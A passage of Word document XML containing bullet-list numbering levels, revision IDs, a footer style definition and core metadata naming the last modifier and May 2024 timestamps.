    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3283" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4251" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5219" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6187" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7155" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8123" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="183136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14D"/>
    <w:rsid w:val="00000088"/>
    <w:rsid w:val="00484C8E"/>
    <w:rsid w:val="0072214D"/>
    <w:rsid w:val="007E2D08"/>
    <w:rsid w:val="00871985"/>
    <w:rsid w:val="00A60A70"/>
    <w:rsid w:val="00D51593"/>
    <w:rsid w:val="00F3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ACE57"/>
  <w15:docId w15:val="{C6534B02-5EC0-4DA9-AD19-06EE543B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0008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88"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0000008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8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9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0.png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Hemanth Kumar D</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T18:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>